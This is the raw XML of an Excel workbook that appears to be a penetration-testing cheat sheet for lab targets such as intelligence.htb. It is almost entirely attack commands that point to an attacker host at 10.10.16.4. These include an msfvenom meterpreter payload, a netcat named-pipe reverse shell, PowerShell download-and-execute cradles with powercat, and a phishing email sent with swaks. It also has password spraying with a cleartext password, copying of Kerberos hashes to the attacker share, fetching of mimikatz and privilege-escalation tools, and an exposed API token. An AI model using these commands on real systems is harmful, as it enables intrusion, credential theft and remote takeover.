      <c r="B37" s="3" t="s">
        <v>500</v>
      </c>
      <c r="C37" s="3" t="str">
        <f>"msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST="&amp;C10&amp;'101. ExploitTools'!$C$4&amp;" LPORT=443 -f elf &gt; met.elf"</f>
        <v>msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=443 -f elf &gt; met.elf</v>
      </c>
      <c r="D37" s="3" t="s">
        <v>501</v>
      </c>
    </row>
    <row r="40" spans="2:4">
      <c r="B40" s="4" t="s">
        <v>503</v>
      </c>
    </row>
    <row r="41" spans="2:4">
      <c r="B41" s="3" t="s">
        <v>504</v>
      </c>
    </row>
    <row r="43" spans="2:4">
      <c r="B43" s="4" t="s">
        <v>505</v>
      </c>
    </row>
    <row r="44" spans="2:4">
      <c r="B44" s="3" t="s">
        <v>506</v>
      </c>
    </row>
    <row r="45" spans="2:4">
      <c r="B45" s="3" t="s">
        <v>507</v>
      </c>
      <c r="C45" s="13"/>
    </row>
    <row r="46" spans="2:4">
      <c r="B46" s="3" t="s">
        <v>508</v>
      </c>
    </row>
    <row r="47" spans="2:4">
      <c r="B47" s="3" t="s">
        <v>509</v>
      </c>
    </row>
    <row r="48" spans="2:4">
      <c r="B48" s="3" t="s">
        <v>510</v>
      </c>
    </row>
    <row r="50" spans="2:4">
      <c r="B50" s="4" t="s">
        <v>511</v>
      </c>
    </row>
    <row r="51" spans="2:4">
      <c r="B51" s="3" t="s">
        <v>512</v>
      </c>
      <c r="D51" s="3" t="s">
        <v>513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BCCF-8A69-45BD-B5A5-EFB5EF00529F}">
  <dimension ref="B2:C67"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B18" sqref="B18"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="18.75"/>
  <cols>
    <col min="1" max="1" width="9" style="3"/>
    <col min="2" max="2" width="18.25" style="3" customWidth="1"/>
    <col min="3" max="3" width="91.25" style="3" customWidth="1"/>
    <col min="4" max="4" width="52.625" style="3" customWidth="1"/>
    <col min="5" max="16384" width="9" style="3"/>
  </cols>
  <sheetData>
    <row r="2" spans="2:3">
      <c r="B2" s="3" t="s">
        <v>514</v>
      </c>
    </row>
    <row r="4" spans="2:3">
      <c r="B4" s="3" t="s">
        <v>4</v>
      </c>
      <c r="C4" s="3" t="str">
        <f>'1. Reconnaissance'!C4</f>
        <v>10.10.16.4</v>
      </c>
    </row>
    <row r="10" spans="2:3">
      <c r="B10" s="3" t="s">
        <v>515</v>
      </c>
    </row>
    <row r="11" spans="2:3">
      <c r="B11" s="3" t="s">
        <v>516</v>
      </c>
    </row>
    <row r="12" spans="2:3">
      <c r="B12" s="3" t="s">
        <v>517</v>
      </c>
    </row>
    <row r="13" spans="2:3">
      <c r="B13" s="3" t="s">
        <v>518</v>
      </c>
    </row>
    <row r="14" spans="2:3">
      <c r="B14" s="3" t="s">
        <v>519</v>
      </c>
    </row>
    <row r="15" spans="2:3">
      <c r="B15" s="3" t="s">
        <v>520</v>
      </c>
    </row>
    <row r="16" spans="2:3">
      <c r="B16" s="3" t="s">
        <v>521</v>
      </c>
    </row>
    <row r="17" spans="2:2">
      <c r="B17" s="3" t="s">
        <v>522</v>
      </c>
    </row>
    <row r="18" spans="2:2">
      <c r="B18" s="3" t="s">
        <v>212</v>
      </c>
    </row>
    <row r="19" spans="2:2">
      <c r="B19" s="3" t="s">
        <v>523</v>
      </c>
    </row>
    <row r="20" spans="2:2">
      <c r="B20" s="3" t="s">
        <v>524</v>
      </c>
    </row>
    <row r="21" spans="2:2">
      <c r="B21" s="3" t="s">
        <v>525</v>
      </c>
    </row>
    <row r="22" spans="2:2">
      <c r="B22" s="3" t="s">
        <v>526</v>
      </c>
    </row>
    <row r="23" spans="2:2">
      <c r="B23" s="3" t="s">
        <v>527</v>
      </c>
    </row>
    <row r="24" spans="2:2">
      <c r="B24" s="3" t="s">
        <v>528</v>
      </c>
    </row>
    <row r="25" spans="2:2">
      <c r="B25" s="3" t="s">
        <v>529</v>
      </c>
    </row>
    <row r="26" spans="2:2">
      <c r="B26" s="3" t="s">
        <v>530</v>
      </c>
    </row>
    <row r="27" spans="2:2">
      <c r="B27" s="3" t="s">
        <v>531</v>
      </c>
    </row>
    <row r="28" spans="2:2">
      <c r="B28" s="3" t="s">
        <v>532</v>
      </c>
    </row>
    <row r="29" spans="2:2">
      <c r="B29" s="3" t="s">
        <v>533</v>
      </c>
    </row>
    <row r="30" spans="2:2">
      <c r="B30" s="3" t="s">
        <v>534</v>
      </c>
    </row>
    <row r="31" spans="2:2">
      <c r="B31" s="3" t="s">
        <v>535</v>
      </c>
    </row>
    <row r="66" spans="2:2">
      <c r="B66" s="3" t="str">
        <f>"powershell.exe -c IEX(New-Object System.Net.WebClient).DownloadString('http://"&amp;$C$4&amp;"/'101. ExploitTools'!B24Invoke-PowerShellTcp.ps1')"</f>
        <v>powershell.exe -c IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.16.4/'101. ExploitTools'!B24Invoke-PowerShellTcp.ps1')</v>
      </c>
    </row>
    <row r="67" spans="2:2">
      <c r="B67" s="3" t="str">
        <f>"powershell.exe -c IEX(New-Object System.Net.WebClient).DownloadString('http://"&amp;$C$4&amp;"/'101. ExploitTools'!B23')"</f>
        <v>powershell.exe -c IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.16.4/'101. ExploitTools'!B23')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CB4A-4F16-4FBB-8109-BA32F1FBC72D}">
  <dimension ref="B4:W48"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B39" sqref="B39"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="18.75"/>
  <cols>
    <col min="1" max="1" width="9" style="3"/>
    <col min="2" max="2" width="12" style="3" customWidth="1"/>
    <col min="3" max="16384" width="9" style="3"/>
  </cols>
  <sheetData>
    <row r="4" spans="2:14">
      <c r="B4" s="3" t="s">
        <v>4</v>
      </c>
      <c r="C4" s="3" t="str">
        <f>'1. Reconnaissance'!C4</f>
        <v>10.10.16.4</v>
      </c>
    </row>
    <row r="7" spans="2:14">
      <c r="B7" s="14" t="s">
        <v>536</v>
      </c>
    </row>
    <row r="8" spans="2:14" ht="18.75" customHeight="1">
      <c r="B8" s="36" t="s">
        <v>537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2:14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2:14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2:14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2:14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2:14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spans="2:14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2:14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spans="2:14"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2:14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2:14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</row>
    <row r="19" spans="2:14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spans="2:14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</row>
    <row r="21" spans="2:14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2:14"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2:14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2:14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30" spans="2:14">
      <c r="B30" s="4" t="s">
        <v>538</v>
      </c>
    </row>
    <row r="31" spans="2:14">
      <c r="B31" s="38" t="str">
        <f>"powershell.exe -c ""IEX(New-Object System.Net.WebClient).DownloadString('http://"&amp;C4&amp;"/powercat.ps1');powercat -c "&amp;C4&amp;" -p 443 -e powershell"""</f>
        <v>powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.16.4/powercat.ps1');powercat -c 10.10.16.4 -p 443 -e powershell"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2:14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2:23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8" spans="2:23">
      <c r="B38" s="4" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="39" spans="2:23">
      <c r="B39" s="15" t="str">
        <f>"sudo swaks --to "&amp;C42&amp;"@"&amp;C41&amp;" --from "&amp;C43&amp;"@"&amp;C41&amp;" --attach @config.Library-ms --server "&amp;C44&amp;" --body @body.txt --header 'Subject: Staging Script' --suppress-data -ap"</f>
        <v>sudo swaks --to marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.196.242 --body @body.txt --header 'Subject: Staging Script' --suppress-data -ap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1" spans="2:23">
      <c r="B41" s="3" t="s">
        <v>540</v>
      </c>
      <c r="C41" s="3" t="s">
        <v>541</v>
      </c>
    </row>
    <row r="42" spans="2:23">
      <c r="B42" s="3" t="s">
        <v>542</v>
      </c>
      <c r="C42" s="3" t="s">
        <v>543</v>
      </c>
    </row>
    <row r="43" spans="2:23">
      <c r="B43" s="3" t="s">
        <v>544</v>
      </c>
      <c r="C43" s="3" t="s">
        <v>545</v>
      </c>
    </row>
    <row r="44" spans="2:23">
      <c r="B44" s="3" t="s">
        <v>546</v>
      </c>
      <c r="C44" s="3" t="s">
        <v>547</v>
      </c>
    </row>
    <row r="47" spans="2:23">
      <c r="B47" s="4" t="s">
        <v>548</v>
      </c>
    </row>
    <row r="48" spans="2:23">
      <c r="B48" s="3" t="s">
        <v>51</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="B8:N24"/>
    <mergeCell ref="B31:N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A906-A81E-4A68-8B6F-0E8C53C457CB}">
  <dimension ref="B2:N71"/>
  <sheetViews>
    <sheetView topLeftCell="A6" workbookViewId="0">
      <selection activeCell="B70" sqref="B70"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="18.75"/>
  <cols>
    <col min="1" max="1" width="9" style="3"/>
    <col min="2" max="2" width="12.625" style="3" customWidth="1"/>
    <col min="3" max="16384" width="9" style="3"/>
  </cols>
  <sheetData>
    <row r="2" spans="2:3">
      <c r="B2" s="3" t="s">
        <v>549</v>
      </c>
    </row>
    <row r="4" spans="2:3">
      <c r="B4" s="3" t="s">
        <v>4</v>
      </c>
      <c r="C4" s="3" t="str">
        <f>'1. Reconnaissance'!C4</f>
        <v>10.10.16.4</v>
      </c>
    </row>
    <row r="11" spans="2:3">
      <c r="B11" s="3" t="s">
        <v>550</v>
      </c>
    </row>
    <row r="21" spans="2:14">
      <c r="B21" s="4" t="s">
        <v>551</v>
      </c>
    </row>
    <row r="22" spans="2:14">
      <c r="B22" s="38" t="str">
        <f>"1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("""&amp;C26&amp;""", $_)) ""TCP port $_ is open""} 2&gt;$null"</f>
        <v>1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("172.16.90.21", $_)) "TCP port $_ is open"} 2&gt;$null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2:14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spans="2:14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6" spans="2:14">
      <c r="B26" s="3" t="s">
        <v>552</v>
      </c>
      <c r="C26" s="3" t="s">
        <v>553</v>
      </c>
    </row>
    <row r="35" spans="2:14">
      <c r="B35" s="36" t="s">
        <v>554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2:14"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spans="2:14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</row>
    <row r="38" spans="2:14"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</row>
    <row r="39" spans="2:14"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2:14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spans="2:14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2:14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 spans="2:14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2:14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2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2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</row>
    <row r="47" spans="2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61" spans="2:2">
      <c r="B61" s="3" t="s">
        <v>555</v>
      </c>
    </row>
    <row r="62" spans="2:2">
      <c r="B62" s="3" t="s">
        <v>556</v>
      </c>
    </row>
    <row r="63" spans="2:2">
      <c r="B63" s="3" t="s">
        <v>557</v>
      </c>
    </row>
    <row r="69" spans="2:2">
      <c r="B69" s="3" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="70" spans="2:2">
      <c r="B70" s="3" t="s">
        <v>558</v>
      </c>
    </row>
    <row r="71" spans="2:2">
      <c r="B71" s="3" t="s">
        <v>559</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="B22:N24"/>
    <mergeCell ref="B35:N4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0B50-DA14-4F44-8EE5-A97A4124DA3D}">
  <dimension ref="B5:B14"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B11" sqref="B11"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="18.75"/>
  <cols>
    <col min="1" max="16384" width="9" style="3"/>
  </cols>
  <sheetData>
    <row r="5" spans="2:2">
      <c r="B5" s="4"/>
    </row>
    <row r="10" spans="2:2">
      <c r="B10" s="4" t="s">
        <v>560</v>
      </c>
    </row>
    <row r="11" spans="2:2">
      <c r="B11" s="3" t="s">
        <v>561</v>
      </c>
    </row>
    <row r="13" spans="2:2">
      <c r="B13" s="4" t="s">
        <v>562</v>
      </c>
    </row>
    <row r="14" spans="2:2">
      <c r="B14" s="24" t="s">
        <v>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8EF6-F613-4FE9-AE3E-AE17789592A2}">
  <dimension ref="A1"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection sqref="A1:L1048576"/>
    </sheetView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89CF-5299-42E2-9856-2B2ED86B04EE}">
  <dimension ref="B2:K50"/>
  <sheetViews>
    <sheetView topLeftCell="A27" workbookViewId="0">
      <selection activeCell="F5" sqref="F5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="18.75"/>
  <cols>
    <col min="2" max="2" width="19.75" style="3" customWidth="1"/>
    <col min="3" max="3" width="13.625" style="1" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="9" style="1"/>
    <col min="5" max="5" width="11.875" style="1" customWidth="1"/>
    <col min="6" max="11" width="9" style="1"/>
  </cols>
  <sheetData>
    <row r="2" spans="2:11">
      <c r="B2" s="3" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="4" spans="2:11">
      <c r="B4" s="3" t="s">
        <v>4</v>
      </c>
      <c r="C4" s="1" t="s">
        <v>5</v>
      </c>
      <c r="E4" s="1" t="s">
        <v>6</v>
      </c>
      <c r="F4" s="1" t="s">
        <v>7</v>
      </c>
      <c r="H4" s="1" t="s">
        <v>8</v>
      </c>
      <c r="I4" s="32" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="5" spans="2:11">
      <c r="B5" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C5" s="1" t="s">
        <v>11</v>
      </c>
      <c r="E5" s="1" t="s">
        <v>12</v>
      </c>
      <c r="F5" s="1" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="7" spans="2:11">
      <c r="B7" s="4" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="8" spans="2:11">
      <c r="B8" s="3" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="9" spans="2:11">
      <c r="B9" s="3" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="10" spans="2:11">
      <c r="B10" s="3" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="11" spans="2:11">
      <c r="B11" s="3" t="s">
        <v>18</v>
      </c>
      <c r="K11" s="1" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="12" spans="2:11">
      <c r="B12" s="3" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="13" spans="2:11">
      <c r="B13" s="3" t="str">
        <f>"wpscan --url http://192.168.196.244 --api-token Sa0FaqCBut9Z9EXNtsgbSGXtZlavDssP1af150ocrBo --enumerate p --plugins-detection aggressive "</f>
        <v xml:space="preserve">wpscan --url http://192.168.196.244 --api-token Sa0FaqCBut9Z9EXNtsgbSGXtZlavDssP1af150ocrBo --enumerate p --plugins-detection aggressive </v>
      </c>
    </row>
    <row r="14" spans="2:11">
      <c r="B14" s="3" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="15" spans="2:11">
      <c r="B15" s="25" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="17" spans="2:2">
      <c r="B17" s="4" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="18" spans="2:2">
      <c r="B18" s="3" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="19" spans="2:2">
      <c r="B19" s="3" t="s">
        <v>25</v>
      </c>
    </row>
    <row r="20" spans="2:2">
      <c r="B20" s="3" t="s">
        <v>26</v>
      </c>
    </row>
    <row r="22" spans="2:2">
      <c r="B22" s="4" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="23" spans="2:2">
      <c r="B23" s="3" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="25" spans="2:2">
      <c r="B25" s="4" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="26" spans="2:2" ht="18">
      <c r="B26" s="5" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="28" spans="2:2">
      <c r="B28" s="4" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="29" spans="2:2">
      <c r="B29" s="3" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="32" spans="2:2">
      <c r="B32" s="4" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="33" spans="2:11">
      <c r="B33" s="3" t="str">
        <f>"./windapsearch-linux-amd64 -m users -d "&amp;$C$5</f>
        <v>./windapsearch-linux-amd64 -m users -d 10.10.10.248</v>
      </c>
    </row>
    <row r="34" spans="2:11">
      <c r="B34" s="3" t="str">
        <f>"./windapsearch-linux-amd64 -m users -d "&amp;$C$5&amp;" -u ""manager.htb\raven"" -U --attrs cn,memberof"</f>
        <v>./windapsearch-linux-amd64 -m users -d 10.10.10.248 -u "manager.htb\raven" -U --attrs cn,memberof</v>
      </c>
    </row>
    <row r="35" spans="2:11">
      <c r="B35" s="3" t="s">
        <v>34</v>
      </c>
      <c r="K35" s="1" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="36" spans="2:11">
      <c r="B36" s="3" t="s">
        <v>36</v>
      </c>
      <c r="K36" s="1" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="38" spans="2:11">
      <c r="B38" s="4" t="s">
        <v>37</v>
      </c>
    </row>
    <row r="39" spans="2:11">
      <c r="B39" s="3" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="41" spans="2:11">
      <c r="B41" s="4" t="s">
        <v>39</v>
      </c>
    </row>
    <row r="42" spans="2:11">
      <c r="B42" s="3" t="str">
        <f>"crackmapexec smb "&amp;$F$5&amp;" -u 'anonymous' -p '' --rid-brute 10000"</f>
        <v>crackmapexec smb intelligence.htb -u 'anonymous' -p '' --rid-brute 10000</v>
      </c>
    </row>
    <row r="44" spans="2:11">
      <c r="B44" s="4" t="s">
        <v>40</v>
      </c>
    </row>
    <row r="45" spans="2:11">
      <c r="B45" s="3" t="str">
        <f>"nameserver "&amp;$C$5</f>
        <v>nameserver 10.10.10.248</v>
      </c>
      <c r="F45" s="1" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="46" spans="2:11">
      <c r="B46" s="3" t="str">
        <f>"./kerbrute_linux_amd64 userenum xato-net-10-million-usernames.txt -d "&amp;$F$5&amp;" --dc "&amp;$C$5</f>
        <v>./kerbrute_linux_amd64 userenum xato-net-10-million-usernames.txt -d intelligence.htb --dc 10.10.10.248</v>
      </c>
    </row>
    <row r="47" spans="2:11">
      <c r="B47" s="3" t="str">
        <f>"./kerbrute_linux_amd64 passwordspray users.txt "&amp;$I$4&amp;" -d "&amp;$F$5&amp;" --dc "&amp;$C$5</f>
        <v>./kerbrute_linux_amd64 passwordspray users.txt 'NewIntelligenceCorpUser9876' -d intelligence.htb --dc 10.10.10.248</v>
      </c>
    </row>
    <row r="49" spans="2:2">
      <c r="B49" s="3" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="50" spans="2:2">
      <c r="B50" s="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6A8E-269C-4604-98EF-83D752FD0D9B}">
  <dimension ref="B8:O25"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B6" sqref="B6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.5"/>
  <sheetData>
    <row r="8" spans="2:15" ht="18.75">
      <c r="B8" s="3"/>
      <c r="C8" s="3"/>
    </row>
    <row r="9" spans="2:15" ht="18.75">
      <c r="B9" s="3"/>
      <c r="C9" s="3"/>
    </row>
    <row r="10" spans="2:15" ht="18.75">
      <c r="B10" s="3"/>
      <c r="C10" s="3"/>
    </row>
    <row r="11" spans="2:15" ht="18.75">
      <c r="B11" s="4" t="s">
        <v>43</v>
      </c>
      <c r="C11" s="3"/>
      <c r="E11" t="s">
        <v>44</v>
      </c>
    </row>
    <row r="12" spans="2:15">
      <c r="B12" s="33" t="s">
        <v>45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2:1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2:1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2:15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2:15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17" spans="2:15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2:15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2:15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2:15" ht="18.75">
      <c r="B20" s="8" t="s">
        <v>46</v>
      </c>
      <c r="C20" s="3"/>
    </row>
    <row r="21" spans="2:15" ht="18.75">
      <c r="B21" s="3"/>
      <c r="C21" s="3"/>
    </row>
    <row r="22" spans="2:15" ht="18.75">
      <c r="B22" s="3"/>
      <c r="C22" s="3"/>
    </row>
    <row r="23" spans="2:15" ht="18.75">
      <c r="B23" s="4" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="24" spans="2:15" ht="17.25">
      <c r="B24" s="23" t="str">
        <f>"rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc "&amp;'4. Execution'!$C$4&amp;" 443 &gt;/tmp/f"</f>
        <v>rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.16.4 443 &gt;/tmp/f</v>
      </c>
    </row>
    <row r="25" spans="2:15" ht="18.75">
      <c r="B25" s="3"/>
    </row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="B12:O19"/>
  </mergeCells>
  <hyperlinks>
    <hyperlink ref="B20" r:id="rId1" xr:uid="{742FF6C4-D1C4-4246-A023-32C21D3361E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9BBB-7B88-405D-827B-251B604CA4B1}">
  <dimension ref="B2:I90"/>
  <sheetViews>
    <sheetView topLeftCell="A71" workbookViewId="0">
      <selection activeCell="B91" sqref="B91"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="18.75"/>
  <cols>
    <col min="2" max="2" width="36.625" style="3" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="16.375" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="2" spans="2:9">
      <c r="B2" s="3" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="4" spans="2:9">
      <c r="B4" s="3" t="str">
        <f>'1. Reconnaissance'!B4</f>
        <v>IP (local)</v>
      </c>
      <c r="C4" s="3" t="str">
        <f>'1. Reconnaissance'!C4</f>
        <v>10.10.16.4</v>
      </c>
      <c r="E4" s="3" t="str">
        <f>'1. Reconnaissance'!E4</f>
        <v>username</v>
      </c>
      <c r="F4" s="3" t="str">
        <f>'1. Reconnaissance'!F4</f>
        <v>Tiffany.Molina</v>
      </c>
      <c r="H4" s="3" t="str">
        <f>'1. Reconnaissance'!H4</f>
        <v>password</v>
      </c>
      <c r="I4" s="3" t="str">
        <f>'1. Reconnaissance'!I4</f>
        <v>'NewIntelligenceCorpUser9876'</v>
      </c>
    </row>
    <row r="5" spans="2:9">
      <c r="B5" s="3" t="str">
        <f>'1. Reconnaissance'!B5</f>
        <v>IP(target)</v>
      </c>
      <c r="C5" s="3" t="str">
        <f>'1. Reconnaissance'!C5</f>
        <v>10.10.10.248</v>
      </c>
      <c r="E5" s="3" t="str">
        <f>'1. Reconnaissance'!E5</f>
        <v>domain</v>
      </c>
      <c r="F5" s="3" t="str">
        <f>'1. Reconnaissance'!F5</f>
        <v>intelligence.htb</v>
      </c>
    </row>
    <row r="7" spans="2:9">
      <c r="B7" s="4" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="8" spans="2:9">
      <c r="B8" s="3" t="s">
        <v>50</v>
      </c>
    </row>
    <row r="9" spans="2:9">
      <c r="B9" s="3" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="10" spans="2:9">
      <c r="B10" s="3" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="12" spans="2:9">
      <c r="B12" s="4" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="13" spans="2:9">
      <c r="B13" s="3" t="str">
        <f>"net use \\"&amp;$C$4&amp;"\share /u:kali kali"</f>
        <v>net use \\10.10.16.4\share /u:kali kali</v>
      </c>
    </row>
    <row r="14" spans="2:9">
      <c r="B14" s="3" t="str">
        <f>"copy hashes.kerberoast \\"&amp;C4&amp;"\share\"</f>
        <v>copy hashes.kerberoast \\10.10.16.4\share\</v>
      </c>
    </row>
    <row r="15" spans="2:9">
      <c r="B15" s="3" t="str">
        <f>"scp output.txt kali@"&amp;$C$4&amp;":/tmp"</f>
        <v>scp output.txt kali@10.10.16.4:/tmp</v>
      </c>
    </row>
    <row r="16" spans="2:9">
      <c r="B16" s="3" t="str">
        <f>"certutil -urlcache -split -f http://"&amp;$C$4&amp;"/GodPotato-NET4.exe"</f>
        <v>certutil -urlcache -split -f http://10.10.16.4/GodPotato-NET4.exe</v>
      </c>
    </row>
    <row r="17" spans="2:2">
      <c r="B17" s="21" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="19" spans="2:2">
      <c r="B19" s="4" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="20" spans="2:2">
      <c r="B20" s="3" t="str">
        <f>"Invoke-WebRequest -Uri "&amp;$C$4&amp;"/"&amp;'101. ExploitTools'!B10&amp;" -OutFile "&amp;'101. ExploitTools'!B10</f>
        <v>Invoke-WebRequest -Uri 10.10.16.4/chisel.exe -OutFile chisel.exe</v>
      </c>
    </row>
    <row r="21" spans="2:2">
      <c r="B21" s="3" t="str">
        <f>"Invoke-WebRequest -Uri "&amp;$C$4&amp;"/"&amp;'101. ExploitTools'!B11&amp;" -OutFile "&amp;'101. ExploitTools'!B11</f>
        <v>Invoke-WebRequest -Uri 10.10.16.4/mimikatz.exe -OutFile mimikatz.exe</v>
      </c>
    </row>
    <row r="22" spans="2:2">
      <c r="B22" s="3" t="str">
        <f>"Invoke-WebRequest -Uri "&amp;$C$4&amp;"/"&amp;'101. ExploitTools'!B12&amp;" -OutFile "&amp;'101. ExploitTools'!B12</f>
        <v>Invoke-WebRequest -Uri 10.10.16.4/powercat.ps1 -OutFile powercat.ps1</v>
      </c>
    </row>
    <row r="23" spans="2:2">
      <c r="B23" s="3" t="str">
        <f>"Invoke-WebRequest -Uri "&amp;$C$4&amp;"/"&amp;'101. ExploitTools'!B13&amp;" -OutFile "&amp;'101. ExploitTools'!B13</f>
        <v>Invoke-WebRequest -Uri 10.10.16.4/PowerView.ps1 -OutFile PowerView.ps1</v>
      </c>
    </row>
    <row r="24" spans="2:2">
      <c r="B24" s="3" t="str">
        <f>"Invoke-WebRequest -Uri "&amp;$C$4&amp;"/"&amp;'101. ExploitTools'!B14&amp;" -OutFile "&amp;'101. ExploitTools'!B14</f>
        <v>Invoke-WebRequest -Uri 10.10.16.4/PowerUp.ps1 -OutFile PowerUp.ps1</v>
      </c>
    </row>
    <row r="25" spans="2:2">
      <c r="B25" s="3" t="str">
        <f>"Invoke-WebRequest -Uri "&amp;$C$4&amp;"/"&amp;'101. ExploitTools'!B15&amp;" -OutFile "&amp;'101. ExploitTools'!B15</f>
        <v>Invoke-WebRequest -Uri 10.10.16.4/PrintSpoofer64.exe -OutFile PrintSpoofer64.exe</v>
      </c>
    </row>
    <row r="26" spans="2:2">
      <c r="B26" s="3" t="str">
        <f>"Invoke-WebRequest -Uri "&amp;$C$4&amp;"/"&amp;'101. ExploitTools'!B16&amp;" -OutFile "&amp;'101. ExploitTools'!B16</f>
        <v>Invoke-WebRequest -Uri 10.10.16.4/winPEASx64.exe -OutFile winPEASx64.exe</v>
      </c>
    </row>
    <row r="27" spans="2:2">
      <c r="B27" s="3" t="str">
        <f>"Invoke-WebRequest -Uri "&amp;$C$4&amp;"/"&amp;'101. ExploitTools'!B17&amp;" -OutFile "&amp;'101. ExploitTools'!B17</f>
        <v>Invoke-WebRequest -Uri 10.10.16.4/nc64.exe -OutFile nc64.exe</v>
      </c>
    </row>
    <row r="28" spans="2:2">
      <c r="B28" s="3" t="str">
        <f>"Invoke-WebRequest -Uri "&amp;$C$4&amp;"/"&amp;'101. ExploitTools'!B18&amp;" -OutFile "&amp;'101. ExploitTools'!B18</f>
        <v>Invoke-WebRequest -Uri 10.10.16.4/Procmon64.exe -OutFile Procmon64.exe</v>
      </c>
    </row>
    <row r="29" spans="2:2">
      <c r="B29" s="3" t="str">
        <f>"Invoke-WebRequest -Uri "&amp;$C$4&amp;"/"&amp;'101. ExploitTools'!B19&amp;" -OutFile "&amp;'101. ExploitTools'!B19</f>
        <v>Invoke-WebRequest -Uri 10.10.16.4/GodPotato-NET4.exe -OutFile GodPotato-NET4.exe</v>
      </c>
    </row>
    <row r="30" spans="2:2">
      <c r="B30" s="3" t="str">
        <f>"Invoke-WebRequest -Uri "&amp;$C$4&amp;"/"&amp;'101. ExploitTools'!B20&amp;" -OutFile "&amp;'101. ExploitTools'!B20</f>
        <v>Invoke-WebRequest -Uri 10.10.16.4/Rubeus.exe -OutFile Rubeus.exe</v>
      </c>
    </row>
    <row r="31" spans="2:2">
      <c r="B31" s="3" t="str">
        <f>"Invoke-WebRequest -Uri "&amp;$C$4&amp;"/"&amp;'101. ExploitTools'!B21&amp;" -OutFile "&amp;'101. ExploitTools'!B21</f>
        <v>Invoke-WebRequest -Uri 10.10.16.4/SharpHound.exe -OutFile SharpHound.exe</v>
      </c>
    </row>
    <row r="32" spans="2:2">
      <c r="B32" s="3" t="str">
        <f>"Invoke-WebRequest -Uri "&amp;$C$4&amp;"/"&amp;'101. ExploitTools'!B22&amp;" -OutFile "&amp;'101. ExploitTools'!B22</f>
        <v>Invoke-WebRequest -Uri 10.10.16.4/ligolo_agent.exe -OutFile ligolo_agent.exe</v>
      </c>
    </row>
    <row r="33" spans="2:7">
      <c r="B33" s="3" t="str">
        <f>"Invoke-WebRequest -Uri "&amp;$C$4&amp;"/"&amp;'101. ExploitTools'!B23&amp;" -OutFile "&amp;'101. ExploitTools'!B23</f>
        <v>Invoke-WebRequest -Uri 10.10.16.4/JuicyPotato.exe -OutFile JuicyPotato.exe</v>
      </c>
    </row>
    <row r="34" spans="2:7">
      <c r="B34" s="3" t="str">
        <f>"Invoke-WebRequest -Uri "&amp;$C$4&amp;"/"&amp;'101. ExploitTools'!B24&amp;" -OutFile "&amp;'101. ExploitTools'!B24</f>
        <v>Invoke-WebRequest -Uri 10.10.16.4/Invoke-PowerShellTcp.ps1 -OutFile Invoke-PowerShellTcp.ps1</v>
      </c>
    </row>
    <row r="35" spans="2:7">
      <c r="B35" s="3" t="str">
